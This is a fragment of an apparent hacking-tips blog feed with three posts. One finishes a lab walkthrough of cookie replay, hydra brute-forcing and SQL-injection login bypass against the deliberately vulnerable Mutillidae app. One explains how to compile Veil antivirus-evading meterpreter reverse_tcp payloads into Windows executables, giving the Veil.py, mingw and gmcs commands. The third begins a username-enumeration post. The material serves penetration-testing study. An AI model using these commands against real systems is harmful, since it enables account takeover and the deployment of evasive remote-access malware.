&lt;div style=&quot;text-align: left;&quot;&gt;
(4)To view cookie open cookie.html.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6Usip53bl5qK6bOOGEE2d7QkPt-M64k2O0altQ-V83qE23qqjXRx41-e1x3yzBWgbUqeTxPENmL_4DCuBCWUj3hmZnRWCADGpFUyMcUldNPClSYYVnfNSXWEw9wAkaQL3QgxBMX-h_ENL/s1600/cookie.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;cookie-catcher&quot; border=&quot;0&quot; height=&quot;192&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6Usip53bl5qK6bOOGEE2d7QkPt-M64k2O0altQ-V83qE23qqjXRx41-e1x3yzBWgbUqeTxPENmL_4DCuBCWUj3hmZnRWCADGpFUyMcUldNPClSYYVnfNSXWEw9wAkaQL3QgxBMX-h_ENL/s320/cookie.PNG&quot; title=&quot;cookie-catcher&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&amp;nbsp; &lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
(5)Now you can use any cookie manager add-on to edit cookie; replace cookie which we got.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu2SXbb_aZevUU2kkpcl5EQUG-cGT3AwfPQagH41qzRH_LXbhDYUL1GtK0MWVKlG44EjqNS7HkQGKFC7KiO7NRGkAy-ddMWauFvCZdkIgq-ECTRS23uiIVr5JbyJVG-udOi5b8BruYY0xz/s1600/cookie-manager.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;cookie-manager&quot; border=&quot;0&quot; height=&quot;182&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu2SXbb_aZevUU2kkpcl5EQUG-cGT3AwfPQagH41qzRH_LXbhDYUL1GtK0MWVKlG44EjqNS7HkQGKFC7KiO7NRGkAy-ddMWauFvCZdkIgq-ECTRS23uiIVr5JbyJVG-udOi5b8BruYY0xz/s320/cookie-manager.PNG&quot; title=&quot;edit-cookie&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;(6)After reload we got admin access to web-application.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLHsUU54G9hcVLfM72a_iFfvUK1TMsoQCopFKP4OdI_oe4AixKNTnkjvJJ-CyXC2iL_cdzkD2qcf7BUQtsfrsTl2yDoi402FrHDTe7OWphGezrjEqdwR-0qrzLEZGGU4k68bjQVuE_fUk_/s1600/admin_access.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;admin-access&quot; border=&quot;0&quot; height=&quot;195&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLHsUU54G9hcVLfM72a_iFfvUK1TMsoQCopFKP4OdI_oe4AixKNTnkjvJJ-CyXC2iL_cdzkD2qcf7BUQtsfrsTl2yDoi402FrHDTe7OWphGezrjEqdwR-0qrzLEZGGU4k68bjQVuE_fUk_/s320/admin_access.PNG&quot; title=&quot;admin-access&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
(2)Authentication Bypass Using bruteforce:-&amp;nbsp;&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
You can use hydra or burpe intruder to bruteforce login form of application.&lt;br /&gt;&lt;br /&gt;hydra -l admin -P /root/pass.txt&amp;nbsp; 127.0.0.1 http-post-form &quot;/mutillidae/index.php?page=login.php:username=^USER^&amp;amp;password=^PASS^&amp;amp;login-php-submit-button=Login:Not Logged In&quot;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWObJUM7prvSthKyJ7DeTgV226tVJajKVyoBm3VG4eFMrslzp0E2LC8WRJWW1tSGnIZk4a8VHpyzSE9SMg07qph8v2cuEDezjR3ZDRXisUM3zbNuvUb69RNP1S2_Qjygp4EXrUJVnoMuIR/s1600/bruteforce.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Bruteforce-Using-Hydra&quot; border=&quot;0&quot; height=&quot;114&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWObJUM7prvSthKyJ7DeTgV226tVJajKVyoBm3VG4eFMrslzp0E2LC8WRJWW1tSGnIZk4a8VHpyzSE9SMg07qph8v2cuEDezjR3ZDRXisUM3zbNuvUb69RNP1S2_Qjygp4EXrUJVnoMuIR/s320/bruteforce.PNG&quot; title=&quot;Bruteforce-Using-Hydra&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
(3)Authentication Bypass Using sql injection:-&amp;nbsp;&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
We can inject special database characters or SQL timing attacks into page parameters. We are going to use login page; and inject sql character to&amp;nbsp; login form.&lt;br /&gt;&lt;br /&gt;You can use &lt;a href=&quot;http://tipstrickshack.blogspot.com/2013/01/sql-injection-authentication-bypass.html&quot; target=&quot;_blank&quot;&gt;SQL injection cheat sheet &lt;/a&gt;&amp;amp; we will brute-force&amp;nbsp; using SQL statements.Save it to file.&lt;br /&gt;&lt;br /&gt;hydra -l admin -P /root/sql 127.0.0.1 http-post-form &quot;/mutillidae/index.php?page=login.php:username=^USER^&amp;amp;password=^PASS^&amp;amp;login-php-submit-button=Login:Not Logged In&quot;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAbmRzZy210DAFEjB40IIgB2_R2VBAVRnqYd8IoWxWq7TRqHgG1M8fjottUdQAxAA8k4MPkqDh8CLj7CpVMHeeeB6VHoDLY9NlQcoDINBzoSoEgU5SQtqW_fSoTZD-Ch3v5YVU7dk2Na7Y/s1600/SQL.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;SQL-injection_cheat-sheet&quot; border=&quot;0&quot; height=&quot;140&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAbmRzZy210DAFEjB40IIgB2_R2VBAVRnqYd8IoWxWq7TRqHgG1M8fjottUdQAxAA8k4MPkqDh8CLj7CpVMHeeeB6VHoDLY9NlQcoDINBzoSoEgU5SQtqW_fSoTZD-Ch3v5YVU7dk2Na7Y/s320/SQL.PNG&quot; title=&quot;SQL-injection_cheat-sheet&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
And we got for valid SQL statements ; with help of it we can bypass admin panel.&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://tipstrickshack.blogspot.com/feeds/7852474013476962911/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://tipstrickshack.blogspot.com/2013/11/broken-authentication-session.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/7852474013476962911'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/7852474013476962911'/><link rel='alternate' type='text/html' href='https://tipstrickshack.blogspot.com/2013/11/broken-authentication-session.html' title='Broken Authentication &amp; Session Management in Mutillidae'/><author><name>nirav desai</name><uri>http://www.blogger.com/profile/08873815741123225210</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgayRKvGYMdF1B6oQNdG-yIeoMMz2ohICjCxnjvVZv_WDLmqOnLKza439WUq15vi_GoGRG6_8bxD5XtQArpoI2EuoayGnewB6FhLvdPqROw2sP9fk1Uy4EVWx6c7z_ai8H2s4hzkft9r3GP/s72-c/attacker.png" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5662588500512873533.post-4816460772201818765</id><published>2013-11-16T17:29:00.002+05:30</published><updated>2014-02-06T21:41:41.530+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="bypass AV"/><category scheme="http://www.blogger.com/atom/ns#" term="Veil error"/><title type='text'>How to solve compile error in veil?</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
As you know, &lt;a href=&quot;http://tipstrickshack.blogspot.com/2013/08/bypass-av-using-veil-in-backtrack.html&quot; target=&quot;_blank&quot;&gt;veil&lt;/a&gt; is AV evasion framework for metasploit payload. On the 15th of every month, for the next year, at least one new payload module will be released.Yesterday they released two new payload.&lt;br /&gt;
&lt;br /&gt;
&lt;ol style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;pure windows/meterpreter/reverse_tcp stager, no shellcode&lt;/li&gt;
&lt;li&gt;pure windows/meterpreter/reverse_tcp windows service stager compatible with psexec, no shellcode&lt;/li&gt;
&lt;/ol&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
Compiler Error in c payloads:-&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
&amp;nbsp;Available c payloads:&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; VirtualAlloc&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Poor&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; VoidPointer&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp; Poor&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; meter_rev_tcp&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Excellent&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; meter_rev_tcp_service&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; Excellent&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjif_P1cm6IUOBmFSGNVqM06Hwh9PGjmuDZSxq3Pbv3F2Ri6uhYj1oSY9kamH1zdaiR_4KrdFm9FgFyVUQN9C4_52TJe8rc1YMpjx3Qw4dVVbEac9kojm5v6MdSqu4wSUSe2fn_gjviTq3q/s1600/2.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;c/meter_rev_tcp&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjif_P1cm6IUOBmFSGNVqM06Hwh9PGjmuDZSxq3Pbv3F2Ri6uhYj1oSY9kamH1zdaiR_4KrdFm9FgFyVUQN9C4_52TJe8rc1YMpjx3Qw4dVVbEac9kojm5v6MdSqu4wSUSe2fn_gjviTq3q/s320/2.PNG&quot; height=&quot;186&quot; title=&quot;meter_rev_tcp&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
I used c/meter_rev_tcp. After setting of LHOST &amp;amp; LPORT ; when i try to generate it ; i got error.&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
sh: i686-w64-mingw32-gcc: command not found&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuf0WAmmKwP3kLeQHpN-cHBKW5N5PyGLAHaM_irCYa1kngmtosc7OL9wrbBi8le-cnx8_wt3nvFnwKFm7dtVfCjxXeh_Q6SaEpywvOzZp6EPzkJ2jiSBzbbk5TwChWWaBOHiVqQfNm_lHV/s1600/3.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;i686-w64-mingw32-gcc&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuf0WAmmKwP3kLeQHpN-cHBKW5N5PyGLAHaM_irCYa1kngmtosc7OL9wrbBi8le-cnx8_wt3nvFnwKFm7dtVfCjxXeh_Q6SaEpywvOzZp6EPzkJ2jiSBzbbk5TwChWWaBOHiVqQfNm_lHV/s320/3.PNG&quot; height=&quot;170&quot; title=&quot;i686-w64-mingw32-gcc&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
Okay now we successfully generated payload file, but we get compiler error while compiling into cross-platform exe.&lt;br /&gt;
&lt;br /&gt;
Error clearly suggest that i686-w64-mingw32-gcc is not installed.The mingw-w64 project is a complete run-time environment for gcc to support binaries native to Windows 64-bit and 32-bit operating systems.In short, to compile the payload for 64 bit windows ; we have to install mingw-w64.&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
In case of 32 bit windows os , we can compile it,because when you setup veil environment mingw32 installed using wine.&lt;/div&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
Compile payload for 32 bit:-&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
root@bt:~# cd .wine/drive_c/MinGW/bin/&lt;br /&gt;
&lt;br /&gt;
root@bt:~/.wine/drive_c/MinGW/bin# wine mingw32-gcc.exe /root/veil-output/source/output.c -lwsock32&amp;nbsp; -o output.exe&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFUTt0-ewZWl-zzryUB3CnqDj5ktcoE-Ml8IS8zqUcL_J-J83vmJZkS1C7-1uDDZtZ5ve12Ap415Sj5LcyF4pwKdnuOQ4OPdeVuJRTMPjdVfTiDhTG0OrAgKl1xrtuekTag5vQDT3NSVL_/s1600/1.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;mingw32-gcc&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFUTt0-ewZWl-zzryUB3CnqDj5ktcoE-Ml8IS8zqUcL_J-J83vmJZkS1C7-1uDDZtZ5ve12Ap415Sj5LcyF4pwKdnuOQ4OPdeVuJRTMPjdVfTiDhTG0OrAgKl1xrtuekTag5vQDT3NSVL_/s1600/1.PNG&quot; title=&quot;mingw32-gcc&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
So our payload is compiled into exe for 32 bit windows.&lt;/div&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
Compile payload for 64 bit:-&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
For this purpose you have to install mingw32-w64. &lt;br /&gt;
&lt;br /&gt;
Download from &lt;a href=&quot;http://sourceforge.net/projects/mingw-w64/files/Toolchains%20targetting%20Win64/Personal%20Builds/&quot; target=&quot;_blank&quot;&gt;here&lt;/a&gt; &amp;amp; build it.If you don`t want to install it; then you can use pre-compiled &lt;a href=&quot;http://sourceforge.net/projects/mingw-w64/files/Toolchains%20targetting%20Win64/Personal%20Builds/sezero_4.4_20111031/&quot; target=&quot;_blank&quot;&gt;version&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
root@bt:/media/tools/mingw-w64-bin_i686-linux_20111031_sezero/cross_win64/bin# ./x86_64-w64-mingw32-gcc /root/veil-output/source/output.c -lwsock32 -o output.exe&lt;br /&gt;
&lt;br /&gt;
I don`t test compiled exe&amp;nbsp; in 64 bit, so if anyone use it, please let me know exe is working or not.&lt;br /&gt;
&lt;br /&gt;
If you want to build MinGW-w64 for Win32 and Win64 using automated bash script, &lt;a href=&quot;http://ffmpeg.zeranoe.com/blog/?p=269&quot;&gt;click here. &lt;/a&gt;&lt;/div&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
Compiler error in C#:-&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-weight: normal;&quot;&gt;Available c# payloads:&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; VirtualAlloc&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Poor&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; b64SubVirtualAlloc&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp; Normal&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheURpmRkEv8eVBi2fOec8HcQ9unvyvi6yzruaxgyDmvCunwHvO0cezMypYGi-u_7tK52BR0_aJH_GB73BNcCwzj01rBoCQCsAWgSo2Eg1u5nbPFM3zu-MDtulghqqighbm9S2wnZzs5hcG/s1600/5.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;b64SubVirtualAlloc&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheURpmRkEv8eVBi2fOec8HcQ9unvyvi6yzruaxgyDmvCunwHvO0cezMypYGi-u_7tK52BR0_aJH_GB73BNcCwzj01rBoCQCsAWgSo2Eg1u5nbPFM3zu-MDtulghqqighbm9S2wnZzs5hcG/s1600/5.PNG&quot; title=&quot;b64SubVirtualAlloc&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
root@bt:~/Downloads/Veil-master# ./Veil.py -l c# -p b64SubVirtualAlloc --msfpayload windows/meterpreter/reverse_tcp -o payload --msfoptions LHOST=192.168.56.101 LPORT=443&lt;br /&gt;
&lt;br /&gt;
Our source file has been generated and got following error.&lt;br /&gt;
error CS2007: Unrecognized command-line option: `-platform:x86&#39;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD4SSNaUBe6vXEhLcx5Izih_siTGQeQ29EHacfeGWYcowVF4Te-ZVI-_iBbDhD7K30jDcP7xFMvUOiiJXrbdO6QdvrA7jrsW_-isFtqqBndN7o0_1Zyw1h_ZB-3VPnVJzXcLBHdCUStF84/s1600/6.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;error CS2007&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD4SSNaUBe6vXEhLcx5Izih_siTGQeQ29EHacfeGWYcowVF4Te-ZVI-_iBbDhD7K30jDcP7xFMvUOiiJXrbdO6QdvrA7jrsW_-isFtqqBndN7o0_1Zyw1h_ZB-3VPnVJzXcLBHdCUStF84/s320/6.PNG&quot; height=&quot;110&quot; title=&quot;error CS2007&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
gmcs /root/veil-output/source/payload.cs&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOY4vDlTmQCMwzh47M67A16jJ9-M_b6QJatXWaNbVD78QABIsfq5aUC3wPknDKLmV36Gn6Ah_Y7IsD-5A_HSPFL_7165cSB8kGS8P3tTUk4wkN9_Uf0V6Jt8wMwkZkcqLiGOplv1evkKQE/s1600/4.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;error CS2007&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOY4vDlTmQCMwzh47M67A16jJ9-M_b6QJatXWaNbVD78QABIsfq5aUC3wPknDKLmV36Gn6Ah_Y7IsD-5A_HSPFL_7165cSB8kGS8P3tTUk4wkN9_Uf0V6Jt8wMwkZkcqLiGOplv1evkKQE/s1600/4.PNG&quot; title=&quot;error CS2007&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
Now our exe is generated,it`s in same source folder.&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://tipstrickshack.blogspot.com/feeds/4816460772201818765/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://tipstrickshack.blogspot.com/2013/11/how-to-solve-compile-error-in-veil.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/4816460772201818765'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/4816460772201818765'/><link rel='alternate' type='text/html' href='https://tipstrickshack.blogspot.com/2013/11/how-to-solve-compile-error-in-veil.html' title='How to solve compile error in veil?'/><author><name>nirav desai</name><uri>http://www.blogger.com/profile/08873815741123225210</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjif_P1cm6IUOBmFSGNVqM06Hwh9PGjmuDZSxq3Pbv3F2Ri6uhYj1oSY9kamH1zdaiR_4KrdFm9FgFyVUQN9C4_52TJe8rc1YMpjx3Qw4dVVbEac9kojm5v6MdSqu4wSUSe2fn_gjviTq3q/s72-c/2.PNG" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5662588500512873533.post-140015435051915804</id><published>2013-11-11T13:16:00.000+05:30</published><updated>2013-11-20T14:08:18.817+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Burpe"/><category scheme="http://www.blogger.com/atom/ns#" term="mutillidae"/><category scheme="http://www.blogger.com/atom/ns#" term="Username Enumeration"/><title type='text'>Username Enumeration in Mutillidae using Burpe Intruder.</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
Mutillidae&amp;nbsp; is a free, open source, vulnerable web-application providing a target for web-security tester. Mutillidae can be installed on Linux and Windows using LAMP, WAMP, and XAMMP. &lt;br /&gt;
&lt;br /&gt;
Username &lt;span class=&quot;label&quot;&gt;Enumeration&lt;/span&gt; :- We have an application that will reveal to us when a username exists on the system which can be used in further step like brute-force account.&lt;br /&gt;
&lt;br /&gt;
In Mutilliade login page , when you provide valid username &amp;amp; invalid password , web-application reply us that password incorrect.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqMZoCoICqMbUOlfsnr9BLDJ2I9rz30Iv8usG2yMDpj9GcSk3tr94REd58kmwsM4tyd4AsNFlBnWZgn1Bn_41xUc14l9LhGy8yneyeA4_MAYXcB3w0YcakvEf10OS65EgsdDaPOb1Kjzwv/s1600/password.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Username Enumeration &quot; border=&quot;0&quot; height=&quot;98&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqMZoCoICqMbUOlfsnr9BLDJ2I9rz30Iv8usG2yMDpj9GcSk3tr94REd58kmwsM4tyd4AsNFlBnWZgn1Bn_41xUc14l9LhGy8yneyeA4_MAYXcB3w0YcakvEf10OS65EgsdDaPOb1Kjzwv/s320/password.PNG&quot; title=&quot;Username Enumeration &quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
When we provide invalid username ; then application tell us that Account does not exist.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
